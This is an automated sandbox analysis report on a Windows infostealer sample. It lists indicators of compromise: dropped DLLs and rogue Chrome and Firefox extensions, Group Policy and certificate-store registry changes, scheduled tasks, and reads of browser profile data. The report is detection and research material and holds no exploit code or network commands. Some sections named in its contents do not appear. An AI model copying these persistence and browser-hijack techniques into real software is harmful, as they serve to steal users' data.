Malware Analysis Report

2025-08-11 06:23

Sample ID: 240403-mrle4acc4x
Target: 4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded
SHA256: 4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded
Tags: discovery spyware stealer
Score: 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 8/10

SHA256: 4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded

Threat Level: Likely malicious

The file 4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded was found to be: Likely malicious.

Malicious Activity Summary

discovery spyware stealer

Blocklisted process makes network request

Loads dropped DLL

Checks BIOS information in registry

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Drops desktop.ini file(s)

Checks installed software on the system

Drops Chrome extension

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-04-03 10:41

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-04-03 10:41

Reported: 2024-04-03 10:44

Platform: win10v2004-20240226-en

Max time kernel: 150s

Max time network: 156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A

Reads user/profile data of web browsers

Tags: spyware stealer

Checks installed software on the system

Tags: discovery

Drops Chrome extension

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Program Files (x86)\LCifMpYymZWU2\ueYJqSK.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Program Files (x86)\yvWovCiVU\XssxXq.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\xEVrliM.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Program Files (x86)\mVqQIGUXDOgrC\DzMHvAX.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\UZvEQmh.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Program Files (x86)\mVqQIGUXDOgrC\TowwiFL.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Program Files (x86)\gbPxNkbXHfUn\yvOaXHv.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Program Files (x86)\yvWovCiVU\XVlIWUm.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
File created | C:\Program Files (x86)\LCifMpYymZWU2\lXgsaswxXXnqT.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job | C:\Windows\SysWOW64\schtasks.exe | N/A
File created | C:\Windows\Tasks\eGwAoTnpAObQfPU.job | C:\Windows\SysWOW64\schtasks.exe | N/A
File created | C:\Windows\Tasks\kkPqOHrufYpxTagPJ.job | C:\Windows\SysWOW64\schtasks.exe | N/A

Enumerates physical storage devices

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{64fb06ed-0000-0000-0000-d01200000000}\MaxCapacity = "14116" | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\rundll32.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{64fb06ed-0000-0000-0000-d01200000000} | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\rundll32.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
